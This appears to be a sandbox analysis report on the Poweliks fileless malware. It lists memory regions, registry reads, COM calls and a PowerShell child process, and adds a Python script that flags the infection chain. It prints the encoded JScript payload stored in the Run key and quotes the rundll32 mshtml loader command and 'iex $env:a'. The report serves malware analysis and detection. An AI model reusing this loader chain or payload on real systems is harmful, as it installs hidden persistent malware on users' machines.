pagefile_0x00000000005c0000 0x005c0000 0x00740fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000750000 0x00750000 0x01b4ffff Pagefile Backed Memory Readable True False False
pagefile_0x0000000001b50000 0x01b50000 0x01e92fff Pagefile Backed Memory Readable True False False
oleaccrc.dll 0x01ea0000 0x01ea0fff Memory Mapped File Readable False False False
wshom.ocx 0x01eb0000 0x01ec3fff Memory Mapped File Readable False False False
private_0x0000000001ed0000 0x01ed0000 0x01f4ffff Private Memory Readable, Writable True True False
pagefile_0x0000000001f50000 0x01f50000 0x01f51fff Pagefile Backed Memory Readable True False False
scrrun.dll 0x01f60000 0x01f6ffff Memory Mapped File Readable False False False
private_0x0000000001f70000 0x01f70000 0x01feffff Private Memory Readable, Writable True True False
pagefile_0x0000000001ff0000 0x01ff0000 0x01ff0fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000002000000 0x02000000 0x02001fff Pagefile Backed Memory Readable True False False
cversions.1.db 0x02010000 0x02013fff Memory Mapped File Readable True False False
cversions.2.db 0x02010000 0x02013fff Memory Mapped File Readable True False False
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000010.db 0x02020000 0x0204ffff Memory Mapped File Readable True False False
private_0x0000000002050000 0x02050000 0x020cffff Private Memory Readable, Writable True True False
pagefile_0x00000000020d0000 0x020d0000 0x020d0fff Pagefile Backed Memory Readable, Writable True False False
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db 0x020e0000 0x0210ffff Memory Mapped File Readable True False False
cversions.2.db 0x02110000 0x02113fff Memory Mapped File Readable True False False
private_0x0000000002140000 0x02140000 0x021bffff Private Memory Readable, Writable True True False
pagefile_0x00000000021c0000 0x021c0000 0x0229efff Pagefile Backed Memory Readable True False False
sortdefault.nls 0x022a0000 0x0256efff Memory Mapped File Readable False False False
private_0x0000000002590000 0x02590000 0x0260ffff Private Memory Readable, Writable True True False
private_0x0000000002610000 0x02610000 0x0270ffff Private Memory Readable, Writable True True False
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db 0x02710000 0x02775fff Memory Mapped File Readable True False False
private_0x00000000027d0000 0x027d0000 0x0284ffff Private Memory Readable, Writable True True False
private_0x0000000002850000 0x02850000 0x028cffff Private Memory Readable, Writable True True False
pagefile_0x00000000028d0000 0x028d0000 0x02cc2fff Pagefile Backed Memory Readable True False False
ieframe.dll 0x02cd0000 0x03886fff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000003890000 0x03890000 0x0398ffff Private Memory Readable, Writable True True False
private_0x0000000003990000 0x03990000 0x03a90fff Private Memory Readable, Writable True True False
private_0x0000000003a10000 0x03a10000 0x03a8ffff Private Memory Readable, Writable True True False
user32.dll 0x77160000 0x77259fff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x77260000 0x7737efff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77380000 0x77528fff Memory Mapped File Readable, Writable, Executable False False False
psapi.dll 0x77540000 0x77546fff Memory Mapped File Readable, Writable, Executable False False False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True True False
private_0x000000007fff4000 0x7fff4000 0x7fff4fff Private Memory Readable, Writable True True False
rundll32.exe 0xff240000 0xff24efff Memory Mapped File Readable, Writable, Executable False False False
mshtml.dll 0x7fef2d10000 0x7fef35a7fff Memory Mapped File Readable, Writable, Executable False False False
jscript.dll 0x7fef3bc0000 0x7fef3ca2fff Memory Mapped File Readable, Writable, Executable True False False
scrrun.dll 0x7fef3e70000 0x7fef3ea3fff Memory Mapped File Readable, Writable, Executable False False False
wshom.ocx 0x7fef42a0000 0x7fef42c7fff Memory Mapped File Readable, Writable, Executable False False False
oleacc.dll 0x7fef46d0000 0x7fef4723fff Memory Mapped File Readable, Writable, Executable False False False
ieframe.dll 0x7fef4730000 0x7fef52e6fff Memory Mapped File Readable, Writable, Executable False False False
msimtf.dll 0x7fef5ab0000 0x7fef5abdfff Memory Mapped File Readable, Writable, Executable False False False
msls31.dll 0x7fef6a80000 0x7fef6abafff Memory Mapped File Readable, Writable, Executable False False False
mpr.dll 0x7fefa550000 0x7fefa567fff Memory Mapped File Readable, Writable, Executable False False False
ntmarta.dll 0x7fefb4a0000 0x7fefb4ccfff Memory Mapped File Readable, Writable, Executable False False False
dwmapi.dll 0x7fefb7f0000 0x7fefb807fff Memory Mapped File Readable, Writable, Executable False False False
uxtheme.dll 0x7fefbc20000 0x7fefbc75fff Memory Mapped File Readable, Writable, Executable False False False
propsys.dll 0x7fefbc80000 0x7fefbdabfff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x7fefbe00000 0x7fefbff3fff Memory Mapped File Readable, Writable, Executable False False False
version.dll 0x7fefc490000 0x7fefc49bfff Memory Mapped File Readable, Writable, Executable False False False
rsaenh.dll 0x7fefc8c0000 0x7fefc906fff Memory Mapped File Readable, Writable, Executable False False False
cryptsp.dll 0x7fefcbc0000 0x7fefcbd6fff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x7fefd190000 0x7fefd1b4fff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x7fefd1c0000 0x7fefd1cefff Memory Mapped File Readable, Writable, Executable False False False
sxs.dll 0x7fefd1d0000 0x7fefd260fff Memory Mapped File Readable, Writable, Executable False False False
rpcrtremote.dll 0x7fefd2b0000 0x7fefd2c3fff Memory Mapped File Readable, Writable, Executable False False False
profapi.dll 0x7fefd2d0000 0x7fefd2defff Memory Mapped File Readable, Writable, Executable False False False
msasn1.dll 0x7fefd370000 0x7fefd37efff Memory Mapped File Readable, Writable, Executable False False False
cfgmgr32.dll 0x7fefd380000 0x7fefd3b5fff Memory Mapped File Readable, Writable, Executable False False False
devobj.dll 0x7fefd3c0000 0x7fefd3d9fff Memory Mapped File Readable, Writable, Executable False False False
crypt32.dll 0x7fefd420000 0x7fefd586fff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x7fefd630000 0x7fefd69afff Memory Mapped File Readable, Writable, Executable False False False
imagehlp.dll 0x7fefd6f0000 0x7fefd706fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x7fefd710000 0x7fefd776fff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x7fefd780000 0x7fefe507fff Memory Mapped File Readable, Writable, Executable False False False
setupapi.dll 0x7fefe510000 0x7fefe6e6fff Memory Mapped File Readable, Writable, Executable False False False
clbcatq.dll 0x7fefe6f0000 0x7fefe788fff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x7fefe830000 0x7fefea32fff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x7fefea40000 0x7fefea6dfff Memory Mapped File Readable, Writable, Executable False False False
iertutil.dll 0x7fefea70000 0x7fefecc8fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x7fefecd0000 0x7fefedd8fff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x7fefede0000 0x7fefeeb6fff Memory Mapped File Readable, Writable, Executable False False False
wldap32.dll 0x7fefeed0000 0x7fefef21fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x7fefef30000 0x7feff00afff Memory Mapped File Readable, Writable, Executable False False False
urlmon.dll 0x7feff010000 0x7feff187fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x7feff190000 0x7feff2bcfff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x7feff2c0000 0x7feff35efff Memory Mapped File Readable, Writable, Executable False False False
wininet.dll 0x7feff360000 0x7feff489fff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x7feff490000 0x7feff49dfff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x7feff520000 0x7feff5e8fff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x7feff5f0000 0x7feff60efff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x7feff610000 0x7feff680fff Memory Mapped File Readable, Writable, Executable False False False
apisetschema.dll 0x7feff6a0000 0x7feff6a0fff Memory Mapped File Readable, Writable, Executable False False False
private_0x000007fffffac000 0x7fffffac000 0x7fffffadfff Private Memory Readable, Writable True True False
private_0x000007fffffae000 0x7fffffae000 0x7fffffaffff Private Memory Readable, Writable True True False
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory Readable True False False
private_0x000007fffffd4000 0x7fffffd4000 0x7fffffd5fff Private Memory Readable, Writable True True False
private_0x000007fffffd6000 0x7fffffd6000 0x7fffffd7fff Private Memory Readable, Writable True True False
private_0x000007fffffd8000 0x7fffffd8000 0x7fffffd9fff Private Memory Readable, Writable True True False
private_0x000007fffffda000 0x7fffffda000 0x7fffffdbfff Private Memory Readable, Writable True True False
private_0x000007fffffdc000 0x7fffffdc000 0x7fffffdcfff Private Memory Readable, Writable True True False
private_0x000007fffffde000 0x7fffffde000 0x7fffffdffff Private Memory Readable, Writable True True False
Host Behavior
Registry (4)
Operation Key Additional Information Success Count
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features False 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 value_name = COM+Enabled, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKCU\software\microsoft\windows\currentversion\run\ data = #@~^kXcAAA==W!x^DkKxP^WTcV* ODH ax +h,)mDk\p64N+1YcJ\dX:s cj+M\n.oHSuP:n vcTr#IXRKw+ `r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn Nc#p.Y;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\pr(Ln^D`J j1DrwD Utn^Vr#iStbs+v+Z'W b`DDXPA'mR2X2Cx92 \rDGUs+UYUODbxLdvJ]Ar NrDuE*i2{h3J-'/HdhKhc'-Ar NWSdwKh+Md4+^V'--F T'-2WSnDktns^R+anriW' nSP)1Yb\+or(%+1YcJUm.raYk LRwkVjz/D+sr8Ln^DJbi6;x1YrG Pm[Uv#`YMzPDnDEMxPmR"no"+CNvJuFdH-'dW6Yhm.n-':bm.WdG6Yw- nY,0.Cs+hG.0Pd+D;a-w Na--7 cTRl!{ F-wdaJ#pNmmYm4cn#PDY;DU~ZiN86;x1YrG PNc;* a' nSP)1Yb\+or(%+1YcJt/ah^ RUnD7+Do\JC:KhRRTE*iaRK2+ `E!AKJS;B0CVkn*iac/xNv#p;0 'CRA62C N2 -kMWxsnUYUYMkUodcr]O+s2]'-Eb3ERd;(/ODbUT`;cVm/Y&x9n6}0cJJJbQ8#i!WxD'E6UQJcYswEi;WD'WR;.+mYnP6Yor^+cE6UD~OME~O8#pr0vEWY* ;WDRMrY`6c.n/aW /nAG[H#IE6OR;VGd`#I;6'WR;.lOK6Ywk^n`!0U~DD;n*iE6O'6RMOok^+vEWxObpEW/{;0DR62xbdP6O?D.lhv#pE0kR"nl9`+#pEW qDkDn`!0/c]nl9`!0ORjr.+R *bi!0d ;VWdnv#IE6 ;VGk+v#i6RGnVYnsbVnc!0xDbimRI!UcJ'Jr_;0UQr-EPJ5Eb+O~JxW.nkYCDDEB!S8#p0RG+^nYsrV`;W #i)Nh4kVcZ0csbVn2arkYd`ab#PkWc1Nxcb{'T#P[vJE*i)N`rJ*I8vl 2 \r.Kx:UYvJnMG^+k/r#b`ECr#xJbn6,`,P6Y 3 mGNbUTTl=bUZq&RVnYUY.k oc,;Wx7nDDT)=o.WsAm/nv*jDDrxTcB\x#;I&I28ycL}y]Fj!wXI!T|wOpI(Bt(#T\(qKiMOylo]24ycOH/6Heq*V5o]\1xV1xsIz[qj2(U$(.u^h\.Y9(U)3`MoXIqs9M.H^XX4jVoz5qF^N!.zFwA-mys!m1;hK22pUA8._sS}#Zoxs9^N_#X(V]*1Mi1qF}7C"N|:dV._VS}i9qCq6V}o(,q!oA12I-8qs24^T+rVgF1x9^4 ]2( qtm*;"M.sClVI_s;5qFa5Ts"^y.O5sa*nZ46\(mOPy95}qHZqog*1&I^4UX?\t/\HTm,!J3wymy#O5s6lKhsOtUorjs#:(M#%9M.V]V.d}q[4N!`kn?3k8H*1&]V(?Xj\}ktg!lq1;S0.Dlpp;}o1"}qqk(Cs/9VdtV.zpqHN}pgyoKW+j #En?X2\t2(:.Anlt4qs%Kq,0N 6sF;9B40qV(1zjF-t_.d}U(k9!\t(C1^|UX2\tw(:#i(A^FZx1+`]s4V. 
5pIs#_VA}U(/&3HdI(1"JwAq5saa5zXK\sk}q}/5XymjHdI(1.J2wFNV194Vs.mzqd 81Xm2]V(?XH96TCq14m2]A} XV\ sZ}jTw}X]j($s5x.a8M"VmbX3}q}a4h.98y*"N_BFI&]-1kori^IPmV#Nl w/::sD}Uaqm]V5xsPmmkiCjk4Vs%qb6(jfV"[V.OS^BV\:asI&I28yc;pyok4!^E\!174 tV(x]w( X"oKW+i&"t4s]4mspk9oA4^ssO}o]V1x\2dV1s[AVOmVa^4 jE9MsZlq1E":at\&\G&V988x"w4qidKqs!5 Nst;q2rH]j($s5x.28VIsmbXA} \w(:.g}o]W( }W&3s;9:,Mt?&/q^$q5s6a5z6(CqIsp sKm^d::.fiy6-N;aqlpx!9skqbA3`:#!9(B;jCVSt?S3jVoz5qF^N!.z^H3;jy#!UqA(M.Otq*T5o]a4+lM(Ms mHLk`x#E9MsO\?6gelt}y#Vqb3Fmh.T[o9;q;]j($s5x.28VIsmbXGmhjt9M.`+o$VnZVG6tq(:1ZCOEqV[4+8A4mhsO(;t8jVoXIqs9M.zFwA-mysZl OEhKbkKqoE\Mo!(&BXh?I`^xjV|jTL81ZmhV;t8!L9Aq\\C#d\?68iVsz5qq^N!jXnsA7mys!m1EhK3d:s!tMw!42BXnUI`mU.sFj!L8H!1:s;\F!LBwAz4yH^}ujX\?3F9wH*1&]V(jo"1 .De:X*njO$m_AA4+F4Cq*[rN2f9(Bz\*T]V,O5qs!SV9V92s.my#YI:aw\(\Gn(6oCMjX}UqK5sw^5fpLnHbV(HXC(M1rI6$^21s4qBk+igtI t^q;qA(:}oxs0;:M,Ne("w4y*;j2AklppG(^6^qbs4dKo[d3.a[qsdmHLbjf^y9M.DSs]/(Z(w6KdVj*.e\VKsoTlo}^K .TCV,Vm.T3`&s"9M.O}o1"}qqb4u0E" .Z._sh\?Lk:s%1:,.8 \!S^[24NHHSs.;^ysh}`Xt9Ms+\jFs[Vt-}_\b|PDX\(I8ms*oxs#E1 oh\j*4[M^ }`qsNVt7}uH;]y.TKq#!mM1VnZ9utoI}ms1Np "31:..mH(wd3sE9:1.\?o08xj/4;a)|wY:+p1Ttq!;j #E9MsO\?*B8 Isms1Sj+jX9:VN}o\EUMoE\Mas`:.sp?4r}o^OKy9$} 1T(w1Xm2]V(?Xj9*TCqFsS0s!N!jX(&A:}oB mHV1XX(I*08Mj?}qeG|A*^NzFKesws52}oUXT`CIzFUhV.qX.5 \V::sZlotV:#!mM1V1X*_t("1}o]G4ypKqVNs[AF-}_#/\j44(:IdtUq2S0s!NhOD\?o04 #/(ZabnZ]H( I88M`w|UV2S;I5mh,%tqIqmsiwnKO1q!9X[V.8(jTT9uz,q!174 tV1x]N}L2!1:,D}:wy}:eTj2IHl *UF;9 oty\XO*( sO[wV44jtDl#j(q.N_m_sl( aM(aG19Deja? 4t5qFq4 V##y.pI2$yq:1d":,!C_sHHsonjhw|qs$?sqwj.[Dj![-9.w782\h4V4a0N4?s94CwV44o4Ym.#p1.Nue`wj5o4Dl#j(9.wdIo[A5joAf$e5.}D8C^3Kq]!+Atql!9ojAtj5y4yI3^Xmxt. AF$?o]~I3\n"CN~+w[cts4Ij2^Xmswgt2I6Io4Aq*t?o9VCVt%4saZMOeI!sHtA}"Iq]k}3\2Us9bj skt3XZf$pgsw_ix^l.yB(js9W+hH* 0}+}ZHHjts:21pe`Isj2[\}og(:M1`pZXq:[vd&s+wUikDw4wo 4`In. 
}CCN9flZe65:Os"Z,fn_3+48)7I34Igj%WlGov(&]5!sT5FAx[2js?Vs3s} pi2*jZ6spZHHI!BX:sN9iZ6]ps[Ar!9pIj27m`23\s|qM#XUV9^i!\&pUOo}yN~pisK^Z62H`#}gL4O:stsn`6V}qstjh\w:2Ix58$!9FB2m(2P" mH f4Apj$Jljj.H!w# ws$SZsh`:tP:s9hn`6e}^oAHV^h"j90p:t?5LHI\so;dF9snj":} [652.oI!}h[Z*Vj`1|\M#9UVIhiZ*i50o+NTg/:LVxNA**U($L5:B$"CVA^Mg250(apsYGI/Y$6o3+1w)!"fH#"MVe _m-HwLZlP~5g2%SVOL(F[r`:H/`..y6.Ic?o}apZV8}#s/]`s$?`4C53Bo5jsu^As4p`o2piwA"f1yro2." 1Adys9UV9sCj\&pUOoIsNwpisB[A6 ?`X/}jo9:ZY}PyY31y]tIV06jjN:po2*jFV&`&[C3!Z[2Df?oHXK.o8HVs-[0,G5yAh"VsT}j1B[_V3?`4&pVxs5js~jGHwt 1s5?15xA~FygKNy(-js}:IuN2t..i}^B*VsT9FA$i_N21Gt~piwA5m.NZB25j(h`FVa}2s"njX2N8$B.q5l.%IB8A5q?j4A\2Hq:stfi`Ie}s2H?!Oy"MtNpN#Z`?dy9!1"UM3S\y";.joBpq6AS+Is#;, }0H|5K]}"29BP:N$?w40lP~5gMmW58#xL4A\MBq:MwXijwAp`HF.V.GK!wa}`s$p`HHt3HT\j*$iAVUH^LSpiOyt:3XV[njVLhI&2p:V}yCV& 4^o2l^tM? V _N31yH5q:1e` I$n`qTNN45piwA"fA~KjBA`xo2C[\dFIs}LAFp`ear`s5K+3"]`.G}^G69y]TU.AB[AF9py4Xpi9\5k%..`sA}MG\tM#"5!!W}:\54_tFNyt~p#ja#^NHS825:F]#gMYo}`sVjoe7Is9x9Fs~py2nU3BA5js"\2IA]3wAKG)TlZ.~p#}hJ8I4}.]vtMa;tytt[N}jH8om.hI\j2!l? oCj:*y}ssT"jw;i!w&4`[BI0smIT%-t_3q1_]sU3Bj\xtUi`N$IN#0."49"jsV.ZA&:M[A"jo$5K}}t!aAp`Bi.s,.Hi93]0s$IsHvtk0Xtj.}6:s9jG4qNi"Z5jsxNN]W\LVh` 1T"3.x\j^Aq1]j`V`j+IhC29fjj$qIjo$`js$}^s5j#~roz\dF.5S8[wts#9Uy4%"s9"nsA\H8##.b%7.z%"#`F5j#A}s)-dF.}6:s9jG4qpi"M5jsAjVBx}soD`?OqmFoXH3X&HotFNyt~p#}t[ 1U}o4153o$5.}de2W-Hq]INh9I53s~p^[;q.^hnX0-dF.56KwfIse-I^I +os$}Z}fpUO91.o$5jsu8.I5.j4x.%w2Us9Nj:4A5joAg3HoU3s~}!"cpos6lV9+rj%-6js NN4`2]/5js}6:s9jG4qmT"Z5jsVpZXWIxG*dX0X`?,W#y~1I`o$.NpHIU}}\H%-H`HrmMBigX%-6j2-+wt~KijA5tNpN$qKBM9V)"dX%Z82I6?:o!+A}A?o9%CAs$p`oA True 1
Module (14)
Operation Module Additional Information Success Count
Load ADVAPI32.dll base_address = 0x7fefef30000 True 1
Load ole32.dll base_address = 0x7fefe830000 True 1
Get Handle c:\windows\system32\ole32.dll base_address = 0x7fefe830000 True 2
Get Filename process_name = c:\windows\system32\rundll32.exe, file_name_orig = C:\Windows\system32\rundll32.exe, size = 260 True 1
Get Address c:\windows\system32\advapi32.dll function = RegisterTraceGuidsA, address_out = 0x7739f570 True 1
Get Address c:\windows\system32\advapi32.dll function = RegOpenKeyExA, address_out = 0x7fefef4b5f0 True 1
Get Address c:\windows\system32\advapi32.dll function = RegQueryValueExA, address_out = 0x7fefef4c480 True 1
Get Address c:\windows\system32\advapi32.dll function = RegCloseKey, address_out = 0x7fefef50710 True 1
Get Address c:\windows\system32\ole32.dll function = CoGetObjectContext, address_out = 0x7fefe84c920 True 1
Get Address c:\windows\system32\ole32.dll function = CoCreateInstance, address_out = 0x7fefe857490 True 1
Get Address c:\windows\system32\ole32.dll function = CLSIDFromProgIDEx, address_out = 0x7fefe84a4c4 True 1
Get Address c:\windows\system32\ole32.dll function = CoGetClassObject, address_out = 0x7fefe862e18 True 1
Get Address c:\windows\system32\advapi32.dll function = UnregisterTraceGuids, address_out = 0x773a3c80 True 1
COM (10)
Operation Additional Information Success Count
Get Class ID cls_id = 72C24DD5-D70A-438B-8A42-98424B88AFB8, prog_id = WScript.Shell True 2
Get Class ID cls_id = 0D43FE01-F093-11CF-8940-00A0C9054228, prog_id = Scripting.FileSystemObject True 1
Create interface = 00000146-0000-0000-C000-000000000046 (IGlobalInterfaceTable), cls_context = CLSCTX_INPROC_SERVER True 1
Create interface = 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8, cls_context = CLSCTX_INPROC_SERVER True 3
Create interface = 00000001-0000-0000-C000-000000000046 (IClassFactory), cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 2
Create interface = 00000001-0000-0000-C000-000000000046 (IClassFactory), cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
System (2)
Operation Additional Information Success Count
Get Time type = System Time, time = 2017-08-21 15:59:31 (UTC) True 1
Get Info type = Operating System True 1
Environment (2)
Operation Additional Information Success Count
Get Environment String name = JS_PROFILER False 2
Process #3: powershell.exe
(Host: 712, Network: 0)
Information Value
ID #3
File Name c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Command Line "C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe" iex $env:a
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:38, Reason: Child Process
Unmonitor End Time: 00:02:12, Reason: Terminated by Timeout
Monitor Duration 00:01:34
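The command line of Process #2 (rundll32.exe handed a javascript: URL that loads mshtml,RunHTMLApplication), the Read Value of the Run key's (Default) value in Process #2's Registry section (data beginning with the JScript.Encode header #@~^), and the command line of Process #3 (powershell.exe iex $env:a) together make up the Poweliks launch chain recorded in this report. The Python below is an added triage example written for this page, not VMRay's code and not part of the report: it undoes the octal (\74) and percent (%20) escapes in the rundll32 argument to reveal the <script language=jscript.encode> block it writes, flags process-creation records shaped like Process #2 and #3, and scans a Run-key snapshot for the #@~^ header. The two malicious records and the (Default) value are taken from this report (the blob is truncated); the benign rundll32 launch, the benign Run value, the check for non-printable value names, and all function and variable names are assumptions made for the example.

```python
import re

# Command lines of Process #2 and Process #3 exactly as recorded in this report.
RUNDLL32_CMD = (
    r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";'
    r'document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell"))'
    r'.RegRead("HKCU\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>")'
)
POWERSHELL_CMD = r'"C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe" iex $env:a'

JSENC_MAGIC = '#@~^'   # header of a JScript.Encode blob, as in the Run (Default) value read above
RUNDLL32_SCRIPT_URL = re.compile(r'rundll32(?:\.exe)?\s+"?javascript:', re.I)
MSHTML_RUNHTA = re.compile(r'mshtml\s*,\s*RunHTMLApplication', re.I)
PS_IEX_FROM_ENV = re.compile(r'\b(?:iex|invoke-expression)\b.*?\$env:', re.I)


def decode_js_literal(cmdline):
    r"""Undo the two encodings in the rundll32 argument: JScript octal escapes
    (\74 -> '<') and the percent-escape (%20 -> ' ') left over from the javascript: URL."""
    cmdline = re.sub(r'\\([0-7]{1,3})', lambda m: chr(int(m.group(1), 8)), cmdline)
    return re.sub(r'%([0-9A-Fa-f]{2})', lambda m: chr(int(m.group(1), 16)), cmdline)


def triage_process(rec):
    """rec: {'image', 'parent_image', 'cmdline'} from a process-creation event.
    Returns a list of findings; an empty list means nothing looked wrong."""
    findings = []
    image = rec['image'].lower()
    parent = rec.get('parent_image', '').lower()
    cmd = rec['cmdline']
    if image.endswith('rundll32.exe'):
        if RUNDLL32_SCRIPT_URL.search(cmd) or MSHTML_RUNHTA.search(cmd):
            findings.append('rundll32 runs script through mshtml,RunHTMLApplication')
        decoded = decode_js_literal(cmd)
        if re.search(r'<script\b[^>]*jscript\.encode', decoded, re.I) and 'RegRead' in decoded:
            findings.append('decoded payload writes a jscript.encode block fetched with RegRead')
    elif image.endswith('powershell.exe'):
        if PS_IEX_FROM_ENV.search(cmd):
            findings.append('powershell evaluates code taken from an environment variable')
        if parent.endswith('rundll32.exe'):
            findings.append('powershell spawned by rundll32.exe')
    return findings


def scan_run_values(values):
    r"""values: {value_name: data} read from a ...\CurrentVersion\Run key
    ('' is the (Default) value). Returns [(value_label, finding), ...]."""
    hits = []
    for name, data in values.items():
        label = name if name else '(Default)'
        if data.lstrip().startswith(JSENC_MAGIC):
            hits.append((label, 'JScript.Encode blob stored as Run data'))
        if RUNDLL32_SCRIPT_URL.search(data) or MSHTML_RUNHTA.search(data):
            hits.append((label, 'Run entry launches rundll32 with a javascript: URL'))
        if any(ord(c) < 0x20 for c in name):
            # Assumed hygiene check, not something this report shows: regedit cannot display such names.
            hits.append((repr(name), 'non-printable characters in value name'))
    return hits


# Constructed sample input: the two processes from this report plus one benign rundll32 launch.
SAMPLE_PROCESSES = [
    {'image': r'c:\windows\system32\rundll32.exe',
     'parent_image': r'c:\users\5p5nrgjn0js halpmcxz\desktop\poweliks_installer.exe',
     'cmdline': RUNDLL32_CMD},
    {'image': r'c:\windows\syswow64\windowspowershell\v1.0\powershell.exe',
     'parent_image': r'c:\windows\system32\rundll32.exe',
     'cmdline': POWERSHELL_CMD},
    {'image': r'c:\windows\system32\rundll32.exe',            # benign control-panel launch (assumed)
     'parent_image': r'c:\windows\explorer.exe',
     'cmdline': r'rundll32.exe shell32.dll,Control_RunDLL desk.cpl'},
]
# Constructed Run-key snapshot: the (Default) value holds the first bytes of the blob
# read by Process #2 (truncated here); the named value is an assumed benign entry.
SAMPLE_RUN_VALUES = {
    '': '#@~^kXcAAA==W!x^DkKxP^WTcV* ODH ax +h,)mDk',
    'ExampleUpdater': r'"C:\Program Files\Example\updater.exe" /background',
}


def triage_report():
    """Run both checks over the samples; returns {'processes': [...], 'run_values': [...]}."""
    return {
        'processes': [(p['image'], triage_process(p)) for p in SAMPLE_PROCESSES],
        'run_values': scan_run_values(SAMPLE_RUN_VALUES),
    }


if __name__ == '__main__':
    print(decode_js_literal(RUNDLL32_CMD))
    report = triage_report()
    for image, findings in report['processes']:
        print(image, '->', findings or 'clean')
    print(report['run_values'])
```

The decoded rundll32 argument shows why the process is worth flagging on its own: after the escapes are removed, mshtml is asked to execute document.write("<script language=jscript.encode>" + RegRead(HKCU\...\Run\) + "</script>"), so the script body never exists on disk and the command line itself is the only place the loader is visible. The powershell check keys on the same property: iex $env:a takes its code from an environment variable the parent set, which is why nothing in this process's command line reveals what was run.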
OS Process Information
Information Value
PID 0xa58
Parent PID 0xa3c (c:\windows\system32\rundll32.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Groups
  • XDUWTFONO\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, OWNER)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:00010611 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x A5C
0x A74
0x A78
0x A7C
0x A80
0x A84
0x 0
0x A88
Region
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000030000 0x00030000 0x0003ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False
locale.nls 0x00070000 0x000d6fff Memory Mapped File Readable False False False
pagefile_0x00000000000e0000 0x000e0000 0x000e1fff Pagefile Backed Memory Readable, Writable True False False
powershell.exe.mui 0x000f0000 0x000f2fff Memory Mapped File Readable, Writable False False False
